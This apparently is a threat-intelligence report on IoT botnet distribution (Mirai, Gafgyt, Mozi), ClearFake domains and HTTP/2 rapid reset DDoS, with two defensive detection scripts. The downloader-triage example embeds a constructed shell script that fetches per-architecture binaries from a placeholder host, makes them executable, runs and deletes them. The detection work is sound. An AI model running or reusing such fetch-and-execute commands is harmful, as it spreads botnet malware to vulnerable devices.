On April 22, 2026, threat intelligence collection focused primarily on malware distribution infrastructure targeting Internet of Things (IoT) and embedded systems. The predominant threat observed was active distribution of Mirai and Gafgyt botnet malware variants across multiple architectures from two distinct command-and-control servers. Additionally, ClearFake malware distribution was detected through compromised domains, indicating ongoing browser-based social engineering campaigns.
The malware distribution infrastructure demonstrates sophisticated targeting of diverse processor architectures including ARM, MIPS, x86, PowerPC, RISC-V, and s390x platforms, suggesting attackers are maximizing botnet recruitment across vulnerable IoT devices, routers, and embedded systems globally. The presence of HTTP/2 and HTTP/3 DDoS attack modules (h2stream, h2rapidreset, h3flood) indicates these botnets are being weaponized for volumetric distributed denial-of-service campaigns. Legacy Mozi botnet activity was also detected, demonstrating persistence of older IoT threats.
Organizations should prioritize patching and securing IoT devices, implementing network segmentation for embedded systems, and monitoring for unusual outbound traffic patterns indicative of botnet command-and-control communications. The absence of new critical vulnerabilities or known exploited vulnerabilities in this reporting period suggests attackers continue exploiting existing security gaps in poorly maintained IoT infrastructure rather than leveraging zero-day exploits.
Two active malware distribution servers (176.65.139.143 and 176.65.139.8) are hosting Mirai and Gafgyt botnet variants targeting multiple processor architectures, indicating large-scale IoT compromise campaigns.
One of the two servers hosts Mirai botnet variants for 19+ architectures, including ARM, MIPS, x86, PowerPC, RISC-V, and s390x, together with specialized HTTP/2 and HTTP/3 DDoS attack modules (h2stream, h2rapidreset, h3flood) that indicate preparation for volumetric DDoS campaigns.
The other server hosts both Gafgyt and Mirai variants for ARM (ARMV4L, ARMV5L, ARMV6L) and x86 (X86_64, I686) platforms, targeting diverse IoT devices and embedded systems.
Mozi botnet malware distribution observed from IP 123.129.134.47:49044, representing continued activity of this peer-to-peer IoT botnet despite previous disruption efforts. Mozi typically targets unpatched network devices and DVRs.
Two domains (closedsun.over-resweat.in.net and lumcrest0is.over-resweat.in.net) hosting ClearFake malware, a browser-based social engineering framework that displays fake update prompts to trick users into downloading malicious payloads.
Observed malware infrastructure demonstrates sophisticated attack capabilities including HTTP/2 rapid reset attacks, HTTP/3 flooding, and comprehensive architecture coverage for maximum botnet recruitment.
The distribution includes h2rapidreset variants for multiple architectures that abuse the HTTP/2 rapid reset weakness (CVE-2023-44487) to amplify DDoS attacks: because a client can open streams and immediately cancel them far faster than the server can process the corresponding requests, the technique overwhelms servers with minimal attacker resources.
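On the defensive side, the rapid reset pattern is visible at the frame level: one connection emits RST_STREAM frames at a rate, and in a ratio to its HEADERS frames, that no legitimate client approaches. The sliding-window detector below is an added example written for this report, not code from the report or from any of the malware families it names; the frame events are constructed inline, and the threshold values (100 resets per second, a reset ratio near 1.0) are illustrative assumptions that a real deployment would tune to its own traffic.

```python
from collections import defaultdict, deque

HEADERS, RST_STREAM = "HEADERS", "RST_STREAM"


def detect_rapid_reset(events, window_seconds=1.0, max_resets=100):
    """Return {connection_id: peak_resets} for every connection that sent more than
    max_resets RST_STREAM frames inside any sliding window of window_seconds.
    events: iterable of (timestamp_seconds, connection_id, frame_type)."""
    recent = defaultdict(deque)   # per connection: RST_STREAM timestamps still inside the window
    peaks = defaultdict(int)
    for ts, conn, ftype in sorted(events):
        if ftype != RST_STREAM:
            continue
        window = recent[conn]
        window.append(ts)
        while ts - window[0] > window_seconds:
            window.popleft()
        peaks[conn] = max(peaks[conn], len(window))
    return {conn: n for conn, n in peaks.items() if n > max_resets}


def reset_ratio(events):
    """RST_STREAM / HEADERS per connection. Ordinary clients cancel a small fraction of
    their streams; a rapid reset client cancels essentially every stream it opens."""
    headers = defaultdict(int)
    resets = defaultdict(int)
    for _, conn, ftype in events:
        if ftype == HEADERS:
            headers[conn] += 1
        elif ftype == RST_STREAM:
            resets[conn] += 1
    return {conn: resets[conn] / headers[conn] for conn in headers if headers[conn]}


def build_sample_events():
    """Constructed frame log: one ordinary client and one abusive client."""
    events = []
    # Ordinary client: 20 requests spread over ten seconds, every fourth one cancelled.
    for i in range(20):
        t = i * 0.5
        events.append((t, "conn-normal", HEADERS))
        if i % 4 == 0:
            events.append((t + 0.1, "conn-normal", RST_STREAM))
    # Abusive client: 400 open-then-cancel pairs packed into half a second.
    for i in range(400):
        t = i * 0.00125
        events.append((t, "conn-abuse", HEADERS))
        events.append((t + 0.0005, "conn-abuse", RST_STREAM))
    return events


if __name__ == "__main__":
    sample = build_sample_events()
    for conn, peak in detect_rapid_reset(sample).items():
        print(f"{conn}: {peak} resets in one window")
    for conn, ratio in reset_ratio(sample).items():
        print(f"{conn}: reset ratio {ratio:.2f}")
```

Both signals are needed: the rate catches the flood, and the ratio separates it from a busy but well-behaved client that legitimately opens many streams. Servers patched for CVE-2023-44487 apply the same idea by capping per-connection reset rates and closing the connection with GOAWAY when the cap is exceeded.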
Threat actors compiled malware for 15+ distinct processor architectures including emerging platforms (RISC-V) and legacy systems (s390x, PowerPC), maximizing infection surface across IoT devices, embedded systems, routers, and specialized hardware.
A wget.sh shell script was detected on the distribution server; it is likely the initial infection vector for IoT devices with weak credentials or unpatched vulnerabilities, automating the download and execution of the malware binary that matches the victim's architecture.
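Scripts of this kind share a recognisable shape: one fetch per CPU architecture into a world-writable scratch directory, followed by chmod, execution and deletion of the binary. The static triage below is an added example, not the wget.sh from the server or any code from the report; both scripts it examines are constructed stand-ins (the download host is a placeholder, and the benign script is a generic installer), and the architecture list and scoring thresholds are assumptions chosen to match the architectures the report lists.

```python
import re

# Constructed stand-in for the multi-architecture downloader pattern described in the
# report. The host is a placeholder, not an indicator from the report.
SAMPLE_DOWNLOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://DROPPER_HOST_PLACEHOLDER/bins/x86_64 -O x86_64; chmod 777 x86_64; ./x86_64; rm -f x86_64
wget http://DROPPER_HOST_PLACEHOLDER/bins/armv5l -O armv5l; chmod 777 armv5l; ./armv5l; rm -f armv5l
wget http://DROPPER_HOST_PLACEHOLDER/bins/mips -O mips; chmod 777 mips; ./mips; rm -f mips
curl -s http://DROPPER_HOST_PLACEHOLDER/bins/riscv64 -o riscv64; chmod +x riscv64; ./riscv64; rm -f riscv64
"""

# Constructed benign installer: a single download, no execute-then-delete loop.
SAMPLE_BENIGN = """#!/bin/sh
set -e
curl -fsSL https://example.org/releases/tool-1.2.tar.gz -o /opt/tool.tar.gz
tar -xzf /opt/tool.tar.gz -C /opt
"""

FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^;&|\n]*")
URL_RE = re.compile(r"[a-z]+://[^\s;'\"]+", re.I)
# Longer alternatives first so "armv5l" is reported as armv5l rather than just "arm".
ARCH_RE = re.compile(
    r"(armv\d+l|arm\d*|mips(?:el|64)?|x86_64|i[3-6]86|x86|powerpc|ppc\d*|riscv\d*|s390x|sh4|m68k|sparc)"
)
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/var/run", "/dev/shm", "/mnt")


def triage_downloader(script_text):
    """Score a shell script for the fetch-one-binary-per-architecture, execute, delete pattern."""
    archs = set()
    for fetch in FETCH_RE.finditer(script_text):
        for url in URL_RE.findall(fetch.group()):
            filename = url.rsplit("/", 1)[-1].lower()
            match = ARCH_RE.search(filename)
            if match:
                archs.add(match.group(1))
    flags = {
        "multi_arch": len(archs) >= 3,
        "chmod_exec": bool(re.search(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b", script_text)),
        "runs_download": bool(re.search(r"(?:^|[;&|]\s*)\./\S+", script_text, re.M)),
        "deletes_after_run": bool(re.search(r"\brm\s+-r?f\b", script_text)),
        "uses_scratch_dir": any(f"cd {d}" in script_text for d in SCRATCH_DIRS),
    }
    score = sum(flags.values())
    if flags["multi_arch"] and flags["runs_download"]:
        verdict = "likely multi-architecture downloader"
    elif score >= 2:
        verdict = "suspicious"
    else:
        verdict = "no downloader pattern"
    return {"architectures": archs, "flags": flags, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for name, text in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        result = triage_downloader(text)
        print(f"{name}: {result['verdict']} (score {result['score']}, archs {sorted(result['architectures'])})")
```

The architecture fan-out is the strongest single signal: a legitimate installer fetches one artifact for the host it is running on, whereas a downloader that fetches a dozen binaries and runs each in turn is betting that one of them will match. Run as a triage step on scripts recovered from honeypots or from the scratch directories of a suspect device.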
New research was published on indicator-of-compromise (IoC) enrichment methodologies, providing guidance for security teams on leveraging multiple threat intelligence sources for comprehensive threat analysis.
The publication examines why correlating threat indicators across multiple intelligence feeds improves detection accuracy, reduces false positives, and gives contextual understanding of threat actor tactics and infrastructure.